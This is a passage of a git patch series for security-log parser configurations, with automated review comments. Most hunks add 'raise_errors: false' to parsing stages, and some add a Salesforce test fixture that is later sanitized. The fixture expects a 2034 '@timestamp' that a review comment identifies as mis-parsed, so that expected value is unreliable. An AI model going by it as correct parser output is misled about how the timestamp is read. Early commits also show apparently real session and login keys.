@@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml 
@@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" 
diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml 
@@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..5fc6b2eec 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +47,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" 
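Review bot: The new `filter` on `parsed_event` skips the kv stage for messages starting with `pam_unix(`, but nothing records why; the paired fixture changes suggest these lines are not key=value formatted, which is worth stating in the file, e.g. `# pam_unix(...) lines are free text, not key=value; skip them so the KV stage does not fail the event`. Because it is a strict prefix test, a pam_unix line carrying any leading text would still reach the kv parser, which this commit leaves raising; consider whether `raise_errors: false` is wanted here as in the other parsers. If `original.message` can be absent, `.startswith` on an undefined value may itself fail at filter evaluation — confirm. The stage's `properties` continue outside the hunk.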
@@ -84,6 +86,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +97,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +109,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +121,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +146,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" 
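Review bot: In the `@@ -116,6 +121,7 @@` hunk the context line `description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.` is a YAML comment from the first `#` onward, so `description` is actually null and the explanation of the `#NEWLINE#`/`#NEWLINE2#` placeholders used in the `input_field` below it is lost to any tooling that reads the stage. Since this commit already edits the adjacent `properties:` block, quoting the value is cheap: `description: "#NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format."`. The other hunks on this line only add `raise_errors: false` and raise nothing further.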
@@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:52:13 +0200 Subject: [PATCH 004/150] Fix linting --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 4154e0ae785eb3b0a71393a338ecaf0185d827b3 Mon Sep 17 00:00:00 2001 
From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:39:35 +0200 Subject: [PATCH 005/150] Fix: Salesforce USER_AGENT --- .../tests/salesforce_apex_rest_api.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json new file mode 100644 index 000000000..bc47bdc36 --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "event": { + "category": [ + "network" + ], + "dataset": "ApexRestApi", + "type": [ + "info" + ] + }, + 
"@timestamp": "2034-02-21T02:48:31.272150Z", + "http": { + "request": { + "method": "POST" + }, + "response": { + "mime_type": "application/json", + "status_code": 200 + } + }, + "organization": { + "id": "00D2000000015O7" + }, + "related": { + "ip": [ + "129.185.166.150" + ] + }, + "salesforce": { + "login": { + "key": "MJK3WHqyl1nGTQHf" + }, + "request": { + "id": "5-Acr8biM2uu2UsrkBY5B-", + "status": "S" + }, + "session": { + "key": { + "id": "E6btf+6MZDOBIAEF" + } + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "129.185.166.150", + "ip": "129.185.166.150" + }, + "url": { + "path": "/requests" + }, + "user": { + "id": "0057R000008Vnyi" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "9999", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From b6d4a9e42babc2d32b3734b4ffc2c06a1aba6a5d Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:25 +0200 Subject: [PATCH 006/150] fix test --- .../tests/salesforce_apex_rest_api.json | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index bc47bdc36..8c729ea91 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
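Review bot: The expected `"@timestamp": "2034-02-21T02:48:31.272150Z"` disagrees with the event's own `TIMESTAMP_DERIVED` of `2024-10-29T11:27:21.500Z`; numerically it is `TIMESTAMP` (`20241029112721.500`) divided by 10^4 and read as epoch seconds, so the fixture pins a mis-parsed timestamp rather than the intended one. The parser is not part of this patch, so how the value is produced is inferred, but the fixture should expect `"@timestamp": "2024-10-29T11:27:21.500000Z"`, taken from `TIMESTAMP_DERIVED` or from `TIMESTAMP` with a `%Y%m%d%H%M%S.%f`-style format. The later commits in this series that sanitize the identifiers and the user agent in this file leave this value untouched.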
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" 
@@ -24,16 +24,16 @@ } }, "organization": { - "id": "00D2000000015O7" + "id": "11111111111111111" }, "related": { "ip": [ - "129.185.166.150" + "1.2.3.4" ] }, "salesforce": { "login": { - "key": "MJK3WHqyl1nGTQHf" + "key": "xxxxxxxxxxxxxx" }, "request": { "id": "5-Acr8biM2uu2UsrkBY5B-", @@ -49,14 +49,14 @@ } }, "source": { - "address": "129.185.166.150", - "ip": "129.185.166.150" + "address": "1.2.3.4", + "ip": "1.2.3.4" }, "url": { "path": "/requests" }, "user": { - "id": "0057R000008Vnyi" + "id": "user123123123123" }, "user_agent": { "device": { From fc4fc8f197c1c509f4e6b82cbd042d406d4bdbf2 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:54 +0200 Subject: [PATCH 007/150] fix test --- .../salesforce-events/tests/salesforce_apex_rest_api.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index 8c729ea91..c6a4ab44a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIE